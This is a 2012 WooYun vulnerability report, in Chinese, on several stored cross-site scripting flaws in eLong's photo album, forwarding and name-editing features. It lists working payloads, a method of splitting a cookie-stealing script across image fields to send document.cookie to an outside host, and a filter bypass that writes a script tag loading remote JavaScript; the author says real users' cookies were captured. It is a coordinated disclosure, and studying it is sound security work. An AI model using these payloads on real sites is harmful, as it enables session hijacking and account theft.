当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011255

漏洞标题:艺龙多处存储型XSS,突破长度限制跨妹子@@

相关厂商:艺龙旅行网

漏洞作者: P1n9y_fly

提交时间:2012-08-24 07:54

修复时间:2012-10-08 07:55

公开时间:2012-10-08 07:55

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-24: 细节已通知厂商并且等待厂商处理中
2012-08-27: 厂商已经确认,细节仅向厂商公开
2012-09-06: 细节向核心白帽子及相关领域专家公开
2012-09-16: 细节向普通白帽子公开
2012-09-26: 细节向实习白帽子公开
2012-10-08: 细节向公众公开

简要描述:

各种XSS

详细说明:

1. “><img src=1 onerror=alert(1);>
1) 位置:
a) 相册



b) 转发


c) 编辑名称


2) 利用
利用起来非常简单,前两个直接看了就被X,
后面那个一个我们抓了一下包:


上面的几个都非常清晰明了的出现在了网页中,直接CSRF修改subject,不论是自己还是别人,各种被跨。
2. “ onload=”alert(1)”


1) 位置
a) 直接在相册页面被X


b) 跑到编辑图片里面被X


2) 利用
同样方便,方法一:直接X;方法二:CSRFX
当然还有更方便的“突破长度限制跨艺龙妹子”。
3. ‘;alert(document.cookie);//


1) 位置
a) 外面:在相册里面看照片


b) 里面:点进去看照片


2) 利用
最直接,一看就X
4. 突破长度限制跨艺龙妹子!
上面说了这么多,但是有个问题,最多只能输入30个字母,想要跨到艺龙妹子,必须突破长度限制才可以。我们可以利用几种XSS配合突破长度限制。
我们的跨站代码是

http://kocteg.duapp.com/a.php?v=elong&c=’document.cookie’


由于长度限制,我们无法使用这个跨站代码。那么就有下面这个办法,将其拆分
1:” onload=”g=document.cookie”
2:” onload=”h=’http://kocteg’”
3:” onload=”h=h+’.duapp.com/a.’”
4:” onload=”h=h+’php?v=elong&c’”
5:” onload=”h=h+’=’+g”
6:’;windows.open(h);//
分别放到每个图片里面去


只要妹子一点开这个相册,就被跨了。。。。


收到两条。。。因为duapp设置了啥啥啥,导致IP地址获取不到。。。
5. 原理及修复
1) 第一个:“><img src=1 onerror=alert(1);>


“和>木有过滤
2) 第二个:“ onload=”alert(1)”


“木有过滤
3) 第三个:‘;alert(document.cookie);//


调用后单引号木有过滤

漏洞证明:

之前因为elong过滤了尖括号<>和script关键字,一直不能加载JS,只是通过GET传COOKIE而已,今天早上起来测试了一下成功绕过并加载JS 获得原来超过URL限制不能GET到的超长COOKIE

<script/src=http://t.cn/zWEGaNi></script>


上面为加载JS的代码。拆分成

" onload="h='&lt;scr'
" onload="h+='ipt/src=h'
" onload="h+='ttp://t.cn/zWEG'
" onload="h+='aNi&gt;&lt;/scr'
" onload="h+='ipt&gt;'
" onload="document.write(h);


服务器端过滤了<>和script但是客户端并没有。&lt;顺利通过了服务器端通过JS变成了<然后被document.write打印了出来。以下就是获得的超长COOKIE

修复方案:

以上

版权声明:转载请注明来源 P1n9y_fly@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2012-08-27 09:12

厂商回复:

添加对漏洞的补充说明以及做出评价的理由

最新状态:

暂无